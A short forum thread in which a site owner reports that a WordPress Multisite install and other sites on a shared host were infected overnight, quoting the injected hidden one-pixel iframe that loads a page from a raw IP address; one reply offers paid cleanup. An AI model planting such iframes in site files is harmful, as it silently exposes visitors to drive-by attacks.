i recently installed a wpmu site for a client, and then went on to install and modify around 50 templates for the site, it seem like over night the entire site has been infected with malicious iframe code, see below: <iframe src="http://165.194.30.123/qwerty/1/index.php" width=1 height=1 style="visibility: hidden"></iframe> PHP: this code is everywhere, the main index.php admin/index.php it also seems to be on all the header.php, footer.php and index.php file in all the template folder as well. is it possible that this code came from another site thats on the same shared account? as this code seem to have affected multiple sites on the same account, some are running wordpress, some scripts that are also affected are totally unrelated to wordpress. has anyone come across this before and have any suggestions to what can be done?
PM me i can remove the virus from all your files in 20 min How many files you have Trust is most important and last but not least i will charge $50 for it 50% advance Regards Alex
thanks for your offer, but i would like to find out what the solution is and implement the changes myself.